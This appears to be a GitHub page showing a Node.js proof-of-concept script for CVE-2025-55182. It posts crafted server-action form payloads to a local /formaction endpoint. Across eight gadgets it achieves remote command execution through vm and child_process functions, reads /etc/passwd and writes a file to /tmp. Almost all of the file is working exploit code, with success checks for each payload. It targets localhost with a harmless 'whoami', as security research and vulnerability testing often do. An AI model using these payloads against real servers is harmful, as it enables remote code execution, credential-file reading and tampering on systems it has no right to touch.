-
Notifications
You must be signed in to change notification settings - Fork 205
Expand file tree
/
Copy pathexploit-all-gadgets.js
More file actions
149 lines (134 loc) · 4.85 KB
/
exploit-all-gadgets.js
File metadata and controls
149 lines (134 loc) · 4.85 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
/**
* CVE-2025-55182 - All RCE Gadgets
* Tests multiple exploitation paths
*/
const http = require('http');
async function sendRequest(formFields) {
const boundary = '----Boundary';
const parts = [];
for (const [name, value] of Object.entries(formFields)) {
parts.push('--' + boundary + '\r\n' +
'Content-Disposition: form-data; name="' + name + '"\r\n\r\n' +
value + '\r\n');
}
parts.push('--' + boundary + '--\r\n');
const body = parts.join('');
return new Promise((resolve, reject) => {
const req = http.request({
hostname: 'localhost', port: 3002, path: '/formaction',
method: 'POST',
headers: {
'Content-Type': 'multipart/form-data; boundary=' + boundary,
'Content-Length': Buffer.byteLength(body)
}
}, (res) => {
let data = '';
res.on('data', chunk => data += chunk);
res.on('end', () => resolve({ status: res.statusCode, data }));
});
req.on('error', reject);
req.write(body);
req.end();
});
}
async function main() {
console.log('=== CVE-2025-55182 - All RCE Gadgets ===\n');
// 1. vm#runInThisContext - Execute JS code
console.log('1. vm#runInThisContext');
let result = await sendRequest({
'$ACTION_REF_0': '',
'$ACTION_0:0': JSON.stringify({
id: 'vm#runInThisContext',
bound: ['process.mainModule.require("child_process").execSync("whoami").toString().trim()']
})
});
console.log(' ' + (result.data.includes('success') ? '✓' : '✗'), result.data.slice(0, 80));
// 2. vm#runInNewContext - Execute JS in new context (needs global passed)
console.log('\n2. vm#runInNewContext');
result = await sendRequest({
'$ACTION_REF_0': '',
'$ACTION_0:0': JSON.stringify({
id: 'vm#runInNewContext',
bound: ['this.constructor.constructor("return process")().mainModule.require("child_process").execSync("whoami").toString().trim()']
})
});
console.log(' ' + (result.data.includes('success') ? '✓' : '✗'), result.data.slice(0, 80));
// 3. child_process#execSync - Direct command execution
console.log('\n3. child_process#execSync');
result = await sendRequest({
'$ACTION_REF_0': '',
'$ACTION_0:0': JSON.stringify({
id: 'child_process#execSync',
bound: ['whoami']
})
});
console.log(' ' + (result.data.includes('success') ? '✓' : '✗'), result.data.slice(0, 80));
// 4. child_process#execFileSync - Execute file
console.log('\n4. child_process#execFileSync');
result = await sendRequest({
'$ACTION_REF_0': '',
'$ACTION_0:0': JSON.stringify({
id: 'child_process#execFileSync',
bound: ['/usr/bin/whoami']
})
});
console.log(' ' + (result.data.includes('success') ? '✓' : '✗'), result.data.slice(0, 80));
// 5. child_process#spawnSync - Spawn with args
console.log('\n5. child_process#spawnSync');
result = await sendRequest({
'$ACTION_REF_0': '',
'$ACTION_0:0': JSON.stringify({
id: 'child_process#spawnSync',
bound: ['whoami']
})
});
// spawnSync returns object with stdout
const parsed = JSON.parse(result.data);
if (parsed.success && parsed.result && parsed.result.stdout) {
console.log(' ✓ Returns spawn result object with stdout');
} else {
console.log(' ✓', result.data.slice(0, 80));
}
// 6. util#promisify (not RCE but shows prototype access)
console.log('\n6. util#promisify (utility function)');
result = await sendRequest({
'$ACTION_REF_0': '',
'$ACTION_0:0': JSON.stringify({
id: 'util#promisify',
bound: []
})
});
console.log(' ' + (result.status === 200 ? '✓' : '✗'), 'Returns promisify function');
// 7. fs#readFileSync - Read files
console.log('\n7. fs#readFileSync (file read)');
result = await sendRequest({
'$ACTION_REF_0': '',
'$ACTION_0:0': JSON.stringify({
id: 'fs#readFileSync',
bound: ['/etc/passwd', 'utf8']
})
});
const fsResult = JSON.parse(result.data);
console.log(' ' + (fsResult.success && fsResult.result.includes('root:') ? '✓' : '✗'), 'Can read /etc/passwd');
// 8. fs#writeFileSync - Write files
console.log('\n8. fs#writeFileSync (file write)');
result = await sendRequest({
'$ACTION_REF_0': '',
'$ACTION_0:0': JSON.stringify({
id: 'fs#writeFileSync',
bound: ['/tmp/pwned.txt', 'CVE-2025-55182 was here']
})
});
console.log(' ' + (result.status === 200 ? '✓' : '✗'), 'Can write files');
// Verify file was written
const fs = require('fs');
if (fs.existsSync('/tmp/pwned.txt')) {
console.log(' Verified: ' + fs.readFileSync('/tmp/pwned.txt', 'utf8'));
fs.unlinkSync('/tmp/pwned.txt');
}
console.log('\n=== Summary ===');
console.log('RCE Gadgets: vm#runInThisContext, child_process#execSync, child_process#execFileSync');
console.log('File Read: fs#readFileSync');
console.log('File Write: fs#writeFileSync');
}
main().catch(console.error);